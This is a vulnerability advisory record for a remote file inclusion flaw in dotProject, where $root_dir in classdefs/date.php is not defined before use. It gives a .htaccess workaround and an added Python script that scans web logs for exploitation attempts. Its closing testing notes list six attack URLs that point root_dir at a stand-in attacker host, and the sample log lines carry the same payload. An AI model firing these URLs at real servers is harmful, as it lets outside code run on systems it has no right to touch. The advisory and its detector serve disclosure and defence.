dotProject classdefs/date.php $root_dir Arbitrary File Include
2003-01-29T00:00:00
ID: OSVDB:3592
Type: osvdb
Reporter: OSVDB
Modified: 2003-01-29T00:00:00
Description
Vulnerability Description
dotProject contains a flaw that allows a remote attacker to include arbitrary files. Numerous scripts call the classdefs/date.php script without defining or restricting the $root_dir variable, so an attacker can set the variable to an arbitrary server, path or file name. The referenced file may contain malicious commands, which would then be executed on the vulnerable server.
Solution Description
Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround:
Create a .htaccess file containing 'Deny from all' in the /modules/ directory.
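To check web server logs for this issue, the following added example (not part of the original advisory or of dotProject) flags direct requests to scripts under /modules/ that supply root_dir, and reports whether the server answered 403 as it would with the workaround in place. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line and status code inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# Direct request to a PHP script below a /modules/ directory.
MODULE_SCRIPT = re.compile(r"/modules/.+\.php$", re.IGNORECASE)

def inspect_line(line):
    """Return a finding dict if the request sets root_dir on a module script."""
    m = REQUEST.search(line)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    if not MODULE_SCRIPT.search(parts.path):
        return None
    # parse_qsl percent-decodes, so encoded values are seen in clear form.
    values = [v for k, v in parse_qsl(parts.query, keep_blank_values=True)
              if k == "root_dir"]
    if not values:
        return None
    value = values[-1]  # PHP keeps the last occurrence of a repeated parameter
    return {
        "path": parts.path,
        "root_dir": value,
        "remote": "://" in value,        # value names a URL, not a local path
        "denied": m.group(2) == "403",   # 'Deny from all' answers 403
    }

def scan(lines):
    """Findings for every log line that matches."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample entries (documentation addresses and hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Jan/2003:10:00:01 +0000] "GET /dotproject/index.php?m=projects HTTP/1.0" 200 5120',
    '198.51.100.7 - - [29/Jan/2003:10:02:13 +0000] "GET /dotproject/modules/tasks/addedit.php?root_dir=http://files.example.invalid HTTP/1.0" 200 312',
    '198.51.100.7 - - [29/Jan/2003:10:02:15 +0000] "GET /dotproject/modules/projects/view.php?root_dir=http%3A%2F%2Ffiles.example.invalid HTTP/1.0" 403 289',
    '192.0.2.10 - - [29/Jan/2003:10:05:40 +0000] "GET /dotproject/modules/files/index_table.php?project_id=4 HTTP/1.0" 403 289',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with "denied" false on a host where the workaround is supposed to be deployed means the .htaccess file is missing or not being honoured.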
Vendor URL: http://www.dotproject.net/
Secunia Advisory ID: 7974
Related OSVDB ID: 3593
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2003-01/0344.html
ISS X-Force ID: 11192
Bugtraq ID: 6710
Manual Testing Notes
http://[victim]/dotproject/modules/files/index_table.php?root_dir=http://attacker
http://[victim]/dotproject/modules/projects/addedit.php?root_dir=http://attacker
http://[victim]/dotproject/modules/projects/view.php?root_dir=http://attacker
http://[victim]/dotproject/modules/projects/vw_files.php?root_dir=http://attacker
http://[victim]/dotproject/modules/tasks/addedit.php?root_dir=http://attacker
http://[victim]/dotproject/modules/tasks/viewgantt.php?root_dir=http://attacker
Affected Software: dotProject dev20030121
Source: https://vulners.com/osvdb/OSVDB:3592